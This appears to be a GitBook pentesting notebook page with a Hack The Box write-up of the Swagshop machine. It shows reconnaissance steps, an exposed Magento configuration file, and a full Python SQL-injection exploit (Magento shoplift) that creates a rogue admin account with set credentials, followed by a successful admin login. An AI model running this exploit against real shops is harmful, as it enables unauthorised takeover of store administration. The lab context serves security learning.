O
O
Offensive Security
Search…
O
O
Offensive Security
About me / contact me
Penetration Testing with Kali
Note taking
Master your skills
OSCP
Information gathering
Gaining Access - Vulnerability Exploitation
Privilege Escalation
HTB
Active
10.10.10.140 - Swagshop
10.10.10.121
Retired
VulnHub
Brainpan - 1 - Buffer Overflow
Web Vulnerabilities - OWASP TOP 10
SQL Injection
XXE - XML External Entity
Command Injection
Cross Site Scripting
Broken Authentication and Session Management
Insecure Direct Object References
Cross Site Request Forgery
Security Misconfiguration
Insecure Cryptographic Storage
Insufficient Transport Layer Protection
Other Web Vulnerabilities
Remote File Upload
Remote File Inclusion
Local File Inclusion
Personal Projects
WiFi Penetration Testing
Phishing attempts
Case of executing python projects through SilentTrinity
News
Operating System philosophy
Powered By GitBook
10.10.10.140 - Swagshop
Run an Nmap scan on the 10.10.10.140 host, specifying -Sv for service detection:
We learn that the host is running Ubuntu server Xenial release by cross referencing the service version with Ubuntu launchpad repository:
Apache server 2.4.18 is also present indicating web application running on port 80. Dirbuster was used to map the directories structure:
CMS providing the "user experience" is based on Magneto from 2014:
One of the files responsible for configuration was exposed on port 80, revealing root password:
http://10.10.10.140/app/etc/local.xml
10.10.10.140
​
MagnetoConnect manager is present at http://10.10.10.140/downloader revealing version 1.9.0
Vulnerability research:
1
import requests
2
import base64
3
import sys
4
​
5
target = sys.argv[1]
6
​
7
if not target.startswith("http"):
8
target = "http://" + target
9
​
10
if target.endswith("/"):
11
target = target[:-1]
12
​
13
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
14
​
15
# For demo purposes, I use the same attack as is being used in the wild
16
SQLQUERY="""
17
SET @SALT = 'rp';
18
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
19
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
20
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
21
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
22
"""
23
​
24
# Put the nice readable queries into one line,
25
# and insert the username:password combinination
26
query = SQLQUERY.replace("\n", "").format(username="ypwq", password="123")
27
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
28
​
29
# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
30
r = requests.post(target_url,
31
data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
32
"filter": base64.b64encode(pfilter),
33
"forwarded": 1})
34
if r.ok:
35
print "WORKED"
36
print "Check {0}/admin with creds ypwq:123".format(target)
37
else:
38
print "DID NOT WORK"
Copied!
Successful login to an administration panel:
New created credentials were valid for MagnetoConnect Manager as well:
​
WIP
HTB - Previous
Active
Next
10.10.10.121
Last modified 3yr ago
Copy link